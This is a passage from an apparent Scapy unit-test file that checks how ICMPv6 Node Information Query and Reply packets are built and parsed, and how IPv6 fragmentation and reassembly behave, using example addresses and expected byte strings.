== 1 and a.cksum == 0 and a.qtype == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b"\x00"*8 and a.data == b"" + + +############ +############ ++ Test Node Information Query - ICMPv6NIQueryName + += ICMPv6NIQueryName - single label DNS name (internal) +a=ICMPv6NIQueryName(data="abricot").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' + += ICMPv6NIQueryName - single label DNS name +ICMPv6NIQueryName(data="abricot").data == b"abricot" + += ICMPv6NIQueryName - fqdn (internal) +a=ICMPv6NIQueryName(data="n.d.org").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' + += ICMPv6NIQueryName - fqdn +ICMPv6NIQueryName(data="n.d.org").data == b"n.d.org" + += ICMPv6NIQueryName - IPv6 address (internal) +a=ICMPv6NIQueryName(data="2001:db8::1").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' + += ICMPv6NIQueryName - IPv6 address +ICMPv6NIQueryName(data="2001:db8::1").data == "2001:db8::1" + += ICMPv6NIQueryName - IPv4 address (internal) +a=ICMPv6NIQueryName(data="169.254.253.252").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' + += ICMPv6NIQueryName - IPv4 address +ICMPv6NIQueryName(data="169.254.253.252").data == '169.254.253.252' + += ICMPv6NIQueryName - build & dissection +s = raw(IPv6()/ICMPv6NIQueryName(data="n.d.org")) +p = IPv6(s) +ICMPv6NIQueryName in p and p[ICMPv6NIQueryName].data == b"n.d.org" + += ICMPv6NIQueryName - dissection +s = b'\x8b\x00z^\x00\x02\x00\x00\x00\x03g\x90\xc7\xa3\xdd[\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' +p = ICMPv6NIQueryName(s) +p.show() +assert ICMPv6NIQueryName in p and p.data == "ff02::1" + + +############ +############ ++ Test Node Information Query - ICMPv6NIQueryIPv6 + += ICMPv6NIQueryIPv6 - single label DNS name (internal) +a = ICMPv6NIQueryIPv6(data="abricot") +ls(a) +a = a.getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' + += ICMPv6NIQueryIPv6 - single label DNS name +ICMPv6NIQueryIPv6(data="abricot").data == b"abricot" + += ICMPv6NIQueryIPv6 - fqdn (internal) +a=ICMPv6NIQueryIPv6(data="n.d.org").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' + += ICMPv6NIQueryIPv6 - fqdn +ICMPv6NIQueryIPv6(data="n.d.org").data == b"n.d.org" + += ICMPv6NIQueryIPv6 - IPv6 address (internal) +a=ICMPv6NIQueryIPv6(data="2001:db8::1").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' + += ICMPv6NIQueryIPv6 - IPv6 address +ICMPv6NIQueryIPv6(data="2001:db8::1").data == "2001:db8::1" + += ICMPv6NIQueryIPv6 - IPv4 address (internal) +a=ICMPv6NIQueryIPv6(data="169.254.253.252").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' + += ICMPv6NIQueryIPv6 - IPv4 address +ICMPv6NIQueryIPv6(data="169.254.253.252").data == '169.254.253.252' + + +############ +############ ++ Test Node Information Query - ICMPv6NIQueryIPv4 + += ICMPv6NIQueryIPv4 - single label DNS name (internal) +a=ICMPv6NIQueryIPv4(data="abricot").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x07abricot\x00\x00' + += ICMPv6NIQueryIPv4 - single label DNS name +ICMPv6NIQueryIPv4(data="abricot").data == b"abricot" + += ICMPv6NIQueryIPv4 - fqdn (internal) +a=ICMPv6NIQueryIPv4(data="n.d.org").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 1 and a[1] == b'\x01n\x01d\x03org\x00' + += ICMPv6NIQueryIPv4 - fqdn +ICMPv6NIQueryIPv4(data="n.d.org").data == b"n.d.org" + += ICMPv6NIQueryIPv4 - IPv6 address (internal) +a=ICMPv6NIQueryIPv4(data="2001:db8::1").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == '2001:db8::1' + += ICMPv6NIQueryIPv4 - IPv6 address +ICMPv6NIQueryIPv4(data="2001:db8::1").data == "2001:db8::1" + += ICMPv6NIQueryIPv4 - IPv4 address (internal) +a=ICMPv6NIQueryIPv4(data="169.254.253.252").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and a[1] == '169.254.253.252' + += ICMPv6NIQueryIPv4 - IPv4 address +ICMPv6NIQueryIPv4(data="169.254.253.252").data == '169.254.253.252' + += ICMPv6NIQueryIPv4 - dissection +s = b'\x8b\x01\x00\x00\x00\x04\x00\x00\xc2\xb9\xc2\x96\xc3\xa1.H\x07freebsd\x00\x00' +p = ICMPv6NIQueryIPv4(s) +p.show() +assert ICMPv6NIQueryIPv4 in p and p.data == b"freebsd" + += ICMPv6NIQueryIPv4 - hashret() + +random.seed(0x2807) +p = IPv6(src="::", dst="::")/ICMPv6NIQueryIPv4(data="freebsd") +h = p.hashret() +h +assert h in [ + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:g\x02f1\xbd?\xb3\xc4', + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x88\xccb\x19~\x9e\xe3a', + b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:$#\xb5\xb7\xd0\xbf \xe2' +] + + +############ +############ ++ Test Node Information Query - Flags tests + += ICMPv6NIQuery* - flags handling (Test 1) +t = ICMPv6NIQueryIPv6(flags="T") +a = ICMPv6NIQueryIPv6(flags="A") +c = ICMPv6NIQueryIPv6(flags="C") +l = ICMPv6NIQueryIPv6(flags="L") +s = ICMPv6NIQueryIPv6(flags="S") +g = ICMPv6NIQueryIPv6(flags="G") +allflags = ICMPv6NIQueryIPv6(flags="TALCLSG") +t.flags == 1 and a.flags == 2 and c.flags == 4 and l.flags == 8 and s.flags == 16 and g.flags == 32 and allflags.flags == 63 + + += ICMPv6NIQuery* - flags handling (Test 2) +t = raw(ICMPv6NIQueryNOOP(flags="T", nonce="A"*8))[6:8] +a = raw(ICMPv6NIQueryNOOP(flags="A", nonce="A"*8))[6:8] +c = raw(ICMPv6NIQueryNOOP(flags="C", nonce="A"*8))[6:8] +l = raw(ICMPv6NIQueryNOOP(flags="L", nonce="A"*8))[6:8] +s = raw(ICMPv6NIQueryNOOP(flags="S", nonce="A"*8))[6:8] +g = raw(ICMPv6NIQueryNOOP(flags="G", nonce="A"*8))[6:8] +allflags = raw(ICMPv6NIQueryNOOP(flags="TALCLSG", nonce="A"*8))[6:8] +t == b'\x00\x01' and a == b'\x00\x02' and c == b'\x00\x04' and l == b'\x00\x08' and s == b'\x00\x10' and g == b'\x00\x20' and allflags == b'\x00\x3F' + + += ICMPv6NIReply* - flags handling (Test 1) +t = ICMPv6NIReplyIPv6(flags="T") +a = ICMPv6NIReplyIPv6(flags="A") +c = ICMPv6NIReplyIPv6(flags="C") +l = ICMPv6NIReplyIPv6(flags="L") +s = ICMPv6NIReplyIPv6(flags="S") +g = ICMPv6NIReplyIPv6(flags="G") +allflags = ICMPv6NIReplyIPv6(flags="TALCLSG") +t.flags == 1 and a.flags == 2 and c.flags == 4 and l.flags == 8 and s.flags == 16 and g.flags == 32 and allflags.flags == 63 + + += ICMPv6NIReply* - flags handling (Test 2) +t = raw(ICMPv6NIReplyNOOP(flags="T", nonce="A"*8))[6:8] +a = raw(ICMPv6NIReplyNOOP(flags="A", nonce="A"*8))[6:8] +c = raw(ICMPv6NIReplyNOOP(flags="C", nonce="A"*8))[6:8] +l = raw(ICMPv6NIReplyNOOP(flags="L", nonce="A"*8))[6:8] +s = raw(ICMPv6NIReplyNOOP(flags="S", nonce="A"*8))[6:8] +g = raw(ICMPv6NIReplyNOOP(flags="G", nonce="A"*8))[6:8] +allflags = raw(ICMPv6NIReplyNOOP(flags="TALCLSG", nonce="A"*8))[6:8] +t == b'\x00\x01' and a == b'\x00\x02' and c == b'\x00\x04' and l == b'\x00\x08' and s == b'\x00\x10' and g == b'\x00\x20' and allflags == b'\x00\x3F' + + += ICMPv6NIQuery* - Flags Default values +a = ICMPv6NIQueryNOOP() +b = ICMPv6NIQueryName() +c = ICMPv6NIQueryIPv4() +d = ICMPv6NIQueryIPv6() +a.flags == 0 and b.flags == 0 and c.flags == 0 and d.flags == 62 + += ICMPv6NIReply* - Flags Default values +a = ICMPv6NIReplyIPv6() +b = ICMPv6NIReplyName() +c = ICMPv6NIReplyIPv6() +d = ICMPv6NIReplyIPv4() +e = ICMPv6NIReplyRefuse() +f = ICMPv6NIReplyUnknown() +a.flags == 0 and b.flags == 0 and c.flags == 0 and d.flags == 0 and e.flags == 0 and f.flags == 0 + + + +# Nonces +# hashret and answers +# payload guess +# automatic destination address computation when integrated in scapy6 +# at least computeNIGroupAddr + + +############ +############ ++ Test Node Information Query - Dispatching + += ICMPv6NIQueryIPv6 - dispatch with nothing in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv6) + += ICMPv6NIQueryIPv6 - dispatch with IPv6 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="2001::db8::1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv6) + += ICMPv6NIQueryIPv6 - dispatch with IPv4 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="192.168.0.1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv6) + += ICMPv6NIQueryIPv6 - dispatch with name in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv6(data="alfred")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv6) + += ICMPv6NIQueryName - dispatch with nothing in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryName) + += ICMPv6NIQueryName - dispatch with IPv6 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="2001:db8::1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryName) + += ICMPv6NIQueryName - dispatch with IPv4 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="192.168.0.1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryName) + += ICMPv6NIQueryName - dispatch with name in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryName(data="alfred")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryName) + += ICMPv6NIQueryIPv4 - dispatch with nothing in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv4) + += ICMPv6NIQueryIPv4 - dispatch with IPv6 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="2001:db8::1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv4) + += ICMPv6NIQueryIPv4 - dispatch with IPv6 address in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="192.168.0.1")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv4) + += ICMPv6NIQueryIPv4 - dispatch with name in data +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIQueryIPv4(data="alfred")) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIQueryIPv4) + += ICMPv6NIReplyName - dispatch +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyName()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIReplyName) + += ICMPv6NIReplyIPv6 - dispatch +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyIPv6()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIReplyIPv6) + += ICMPv6NIReplyIPv4 - dispatch +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyIPv4()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIReplyIPv4) + += ICMPv6NIReplyRefuse - dispatch +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyRefuse()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIReplyRefuse) + += ICMPv6NIReplyUnknown - dispatch +s = raw(IPv6(src="2001:db8::1", dst="2001:db8::2")/ICMPv6NIReplyUnknown()) +p = IPv6(s) +isinstance(p.payload, ICMPv6NIReplyUnknown) + + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyNOOP + += ICMPv6NIReplyNOOP - single DNS name without hint => understood as string (internal) +a=ICMPv6NIReplyNOOP(data="abricot").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"abricot" + += ICMPv6NIReplyNOOP - single DNS name without hint => understood as string +ICMPv6NIReplyNOOP(data="abricot").data == b"abricot" + += ICMPv6NIReplyNOOP - fqdn without hint => understood as string (internal) +a=ICMPv6NIReplyNOOP(data="n.d.tld").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"n.d.tld" + += ICMPv6NIReplyNOOP - fqdn without hint => understood as string +ICMPv6NIReplyNOOP(data="n.d.tld").data == b"n.d.tld" + += ICMPv6NIReplyNOOP - IPv6 address without hint => understood as string (internal) +a=ICMPv6NIReplyNOOP(data="2001:0db8::1").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"2001:0db8::1" + += ICMPv6NIReplyNOOP - IPv6 address without hint => understood as string +ICMPv6NIReplyNOOP(data="2001:0db8::1").data == b"2001:0db8::1" + += ICMPv6NIReplyNOOP - IPv4 address without hint => understood as string (internal) +a=ICMPv6NIReplyNOOP(data="169.254.253.010").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 0 and a[1] == b"169.254.253.010" + += ICMPv6NIReplyNOOP - IPv4 address without hint => understood as string +ICMPv6NIReplyNOOP(data="169.254.253.010").data == b"169.254.253.010" + + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyName + += ICMPv6NIReplyName - single label DNS name as a rawing (without ttl) (internal) +a=ICMPv6NIReplyName(data="abricot").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x07abricot\x00\x00' + += ICMPv6NIReplyName - single label DNS name as a rawing (without ttl) +ICMPv6NIReplyName(data="abricot").data == [0, b"abricot"] + += ICMPv6NIReplyName - fqdn name as a rawing (without ttl) (internal) +a=ICMPv6NIReplyName(data="n.d.tld").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x01n\x01d\x03tld\x00' + += ICMPv6NIReplyName - fqdn name as a rawing (without ttl) +ICMPv6NIReplyName(data="n.d.tld").data == [0, b'n.d.tld'] + += ICMPv6NIReplyName - list of 2 single label DNS names (without ttl) (internal) +a=ICMPv6NIReplyName(data=["abricot", "poire"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 0 and a[1][1] == b'\x07abricot\x00\x00\x05poire\x00\x00' + += ICMPv6NIReplyName - list of 2 single label DNS names (without ttl) +ICMPv6NIReplyName(data=["abricot", "poire"]).data == [0, b"abricot", b"poire"] + += ICMPv6NIReplyName - [ttl, single-label, single-label, fqdn] (internal) +a=ICMPv6NIReplyName(data=[42, "abricot", "poire", "n.d.tld"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 2 and type(a[1]) is list and len(a[1]) == 2 and a[1][0] == 42 and a[1][1] == b'\x07abricot\x00\x00\x05poire\x00\x00\x01n\x01d\x03tld\x00' + += ICMPv6NIReplyName - [ttl, single-label, single-label, fqdn] +ICMPv6NIReplyName(data=[42, "abricot", "poire", "n.d.tld"]).data == [42, b"abricot", b"poire", b"n.d.tld"] + += ICMPv6NIReplyName - dissection + +s = b'\x8c\x00\xd1\x0f\x00\x02\x00\x00\x00\x00\xd9$\x94\x8d\xc6%\x00\x00\x00\x00\x07freebsd\x00\x00' +p = ICMPv6NIReplyName(s) +p.show() +assert ICMPv6NIReplyName in p and p.data == [0, b'freebsd'] + + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyIPv6 + += ICMPv6NIReplyIPv6 - one IPv6 address without TTL (internal) +a=ICMPv6NIReplyIPv6(data="2001:db8::1").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" + += ICMPv6NIReplyIPv6 - one IPv6 address without TTL +ICMPv6NIReplyIPv6(data="2001:db8::1").data == [(0, '2001:db8::1')] + += ICMPv6NIReplyIPv6 - one IPv6 address without TTL (as a list) (internal) +a=ICMPv6NIReplyIPv6(data=["2001:db8::1"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" + += ICMPv6NIReplyIPv6 - one IPv6 address without TTL (as a list) +ICMPv6NIReplyIPv6(data=["2001:db8::1"]).data == [(0, '2001:db8::1')] + += ICMPv6NIReplyIPv6 - one IPv6 address with TTL (internal) +a=ICMPv6NIReplyIPv6(data=[(0, "2001:db8::1")]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" + += ICMPv6NIReplyIPv6 - one IPv6 address with TTL +ICMPv6NIReplyIPv6(data=[(0, "2001:db8::1")]).data == [(0, '2001:db8::1')] + += ICMPv6NIReplyIPv6 - two IPv6 addresses as a list of rawings (without TTL) (internal) +a=ICMPv6NIReplyIPv6(data=["2001:db8::1", "2001:db8::2"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "2001:db8::1" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "2001:db8::2" + += ICMPv6NIReplyIPv6 - two IPv6 addresses as a list of rawings (without TTL) +ICMPv6NIReplyIPv6(data=["2001:db8::1", "2001:db8::2"]).data == [(0, '2001:db8::1'), (0, '2001:db8::2')] + += ICMPv6NIReplyIPv6 - two IPv6 addresses as a list (first with ttl, second without) (internal) +a=ICMPv6NIReplyIPv6(data=[(42, "2001:db8::1"), "2001:db8::2"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 3 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 42 and a[1][0][1] == "2001:db8::1" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "2001:db8::2" + += ICMPv6NIReplyIPv6 - two IPv6 addresses as a list (first with ttl, second without) +ICMPv6NIReplyIPv6(data=[(42, "2001:db8::1"), "2001:db8::2"]).data == [(42, "2001:db8::1"), (0, "2001:db8::2")] + += ICMPv6NIReplyIPv6 - build & dissection + +s = raw(IPv6()/ICMPv6NIReplyIPv6(data="2001:db8::1")) +p = IPv6(s) +ICMPv6NIReplyIPv6 in p and p.data == [(0, '2001:db8::1')] + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyIPv4 + += ICMPv6NIReplyIPv4 - one IPv4 address without TTL (internal) +a=ICMPv6NIReplyIPv4(data="169.254.253.252").getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" + += ICMPv6NIReplyIPv4 - one IPv4 address without TTL +ICMPv6NIReplyIPv4(data="169.254.253.252").data == [(0, '169.254.253.252')] + += ICMPv6NIReplyIPv4 - one IPv4 address without TTL (as a list) (internal) +a=ICMPv6NIReplyIPv4(data=["169.254.253.252"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" + += ICMPv6NIReplyIPv4 - one IPv4 address without TTL (as a list) +ICMPv6NIReplyIPv4(data=["169.254.253.252"]).data == [(0, '169.254.253.252')] + += ICMPv6NIReplyIPv4 - one IPv4 address with TTL (internal) +a=ICMPv6NIReplyIPv4(data=[(0, "169.254.253.252")]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 1 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" + += ICMPv6NIReplyIPv4 - one IPv4 address with TTL (internal) +ICMPv6NIReplyIPv4(data=[(0, "169.254.253.252")]).data == [(0, '169.254.253.252')] + += ICMPv6NIReplyIPv4 - two IPv4 addresses as a list of rawings (without TTL) +a=ICMPv6NIReplyIPv4(data=["169.254.253.252", "169.254.253.253"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 0 and a[1][0][1] == "169.254.253.252" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "169.254.253.253" + += ICMPv6NIReplyIPv4 - two IPv4 addresses as a list of rawings (without TTL) (internal) +ICMPv6NIReplyIPv4(data=["169.254.253.252", "169.254.253.253"]).data == [(0, '169.254.253.252'), (0, '169.254.253.253')] + += ICMPv6NIReplyIPv4 - two IPv4 addresses as a list (first with ttl, second without) +a=ICMPv6NIReplyIPv4(data=[(42, "169.254.253.252"), "169.254.253.253"]).getfieldval("data") +type(a) is tuple and len(a) == 2 and a[0] == 4 and type(a[1]) is list and len(a[1]) == 2 and type(a[1][0]) is tuple and len(a[1][0]) == 2 and a[1][0][0] == 42 and a[1][0][1] == "169.254.253.252" and len(a[1][1]) == 2 and a[1][1][0] == 0 and a[1][1][1] == "169.254.253.253" + += ICMPv6NIReplyIPv4 - two IPv4 addresses as a list (first with ttl, second without) (internal) +ICMPv6NIReplyIPv4(data=[(42, "169.254.253.252"), "169.254.253.253"]).data == [(42, "169.254.253.252"), (0, "169.254.253.253")] + += ICMPv6NIReplyIPv4 - build & dissection + +s = raw(IPv6()/ICMPv6NIReplyIPv4(data="192.168.0.1")) +p = IPv6(s) +ICMPv6NIReplyIPv4 in p and p.data == [(0, '192.168.0.1')] + +s = raw(IPv6()/ICMPv6NIReplyIPv4(data=[(2807, "192.168.0.1")])) +p = IPv6(s) +ICMPv6NIReplyIPv4 in p and p.data == [(2807, "192.168.0.1")] + + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyRefuse += ICMPv6NIReplyRefuse - basic instantiation +raw(ICMPv6NIReplyRefuse())[:8] == b'\x8c\x01\x00\x00\x00\x00\x00\x00' + += ICMPv6NIReplyRefuse - basic dissection +a=ICMPv6NIReplyRefuse(b'\x8c\x01\x00\x00\x00\x00\x00\x00\xf1\xe9\xab\xc9\x8c\x0by\x18') +a.type == 140 and a.code == 1 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\xf1\xe9\xab\xc9\x8c\x0by\x18' and a.data == None + + +############ +############ ++ Test Node Information Query - ICMPv6NIReplyUnknown + += ICMPv6NIReplyUnknown - basic instantiation +raw(ICMPv6NIReplyUnknown(nonce=b'\x00'*8)) == b'\x8c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += ICMPv6NIReplyRefuse - basic dissection +a=ICMPv6NIReplyRefuse(b'\x8c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.type == 140 and a.code == 2 and a.cksum == 0 and a.unused == 0 and a.flags == 0 and a.nonce == b'\x00'*8 and a.data == None + + +############ +############ ++ Test Node Information Query - utilities + += computeNIGroupAddr +computeNIGroupAddr("scapy") == "ff02::2:f886:2f66" + + +############ +############ ++ IPv6ExtHdrFragment Class Test + += IPv6ExtHdrFragment - Basic Instantiation +raw(IPv6ExtHdrFragment()) == b';\x00\x00\x00\x00\x00\x00\x00' + += IPv6ExtHdrFragment - Instantiation with specific values +raw(IPv6ExtHdrFragment(nh=0xff, res1=0xee, offset=0x1fff, res2=1, m=1, id=0x11111111)) == b'\xff\xee\xff\xfb\x11\x11\x11\x11' + += IPv6ExtHdrFragment - Basic Dissection +a=IPv6ExtHdrFragment(b';\x00\x00\x00\x00\x00\x00\x00') +a.nh == 59 and a.res1 == 0 and a.offset == 0 and a.res2 == 0 and a.m == 0 and a.id == 0 + += IPv6ExtHdrFragment - Instantiation with specific values +a=IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') +a.nh == 0xff and a.res1 == 0xee and a.offset==0x1fff and a.res2==1 and a.m == 1 and a.id == 0x11111111 + += IPv6 - IPv6ExtHdrFragment hashret +a=IPv6()/IPv6ExtHdrFragment(b'\xff\xee\xff\xfb\x11\x11\x11\x11') +a.hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff' + + +############ +############ ++ Test fragment6 function + += fragment6 - test against a long TCP packet with a 1280 MTU +l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) +len(l) == 33 and len(raw(l[-1])) == 644 + += fragment6 - test against a long TCP packet with a 1280 MTU without fragment header +l=fragment6(IPv6()/TCP()/Raw(load="A"*40000), 1280) +len(l) == 33 and len(raw(l[-1])) == 644 + + +############ +############ ++ Test defragment6 function + += defragment6 - test against a long TCP packet fragmented with a 1280 MTU +l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) +raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + b'A'*40000) + + += defragment6 - test against packets with L2 header +l=defragment6(fragment6(Ether()/IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*2000), 1280)) +Ether in l + + += defragment6 - test against a large TCP packet fragmented with a 1280 bytes MTU and missing fragments +l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*40000), 1280) +del(l[2]) +del(l[4]) +del(l[12]) +del(l[18]) +raw(defragment6(l)) == (b'`\x00\x00\x00\x9cT\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xe92\x00\x00' + 2444*b'A' + 1232*b'X' + 2464*b'A' + 1232*b'X' + 9856*b'A' + 1232*b'X' + 7392*b'A' + 1232*b'X' + 12916*b'A') + + += defragment6 - test against a TCP packet fragmented with a 800 bytes MTU and missing fragments +l=fragment6(IPv6()/IPv6ExtHdrFragment()/TCP()/Raw(load="A"*4000), 800) +del(l[4]) +del(l[2]) +raw(defragment6(l)) == b'`\x00\x00\x00\x0f\xb4\x06@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x00P\x00\x00\x00\x00\x00\x00\x00\x00P\x02 